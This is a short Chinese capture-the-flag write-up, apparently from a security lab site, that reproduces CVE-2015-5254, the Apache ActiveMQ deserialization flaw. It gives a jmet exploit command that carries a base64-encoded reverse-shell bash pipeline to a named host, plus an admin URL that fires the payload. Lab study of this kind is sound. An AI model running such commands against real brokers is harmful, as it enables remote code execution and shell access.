【初级】activemq 命令执行

CVE-2015-5254

漏洞描述:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

影响版本:Apache ActiveMQ 5.13.0之前5.x版本中

参考资料:

漏洞复现

  1. 启动环境会监听两个端口
图片[1]-【初级】activemq 命令执行-NGC660 安全实验室
30509是漏洞利用端口,30510在在利用完上一个端口之后使用

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,base64加密的反弹shell payload}|{base64,-d}|{bash,-i}” -Yp ROME sm.info-plus.cn 61616

  1. 借助一个工具
图片[2]-【初级】activemq 命令执行-NGC660 安全实验室
  • 执行完之后,进到web管理界面,就是30510端口
  • http://123.58.224.8:30510/admin/browse.jsp?JMSDestination=event
图片[3]-【初级】activemq 命令执行-NGC660 安全实验室
  • 点击之后,自动执行命令
  1. 获取flag
图片[4]-【初级】activemq 命令执行-NGC660 安全实验室
图片[5]-【初级】activemq 命令执行-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞8赏点小钱 分享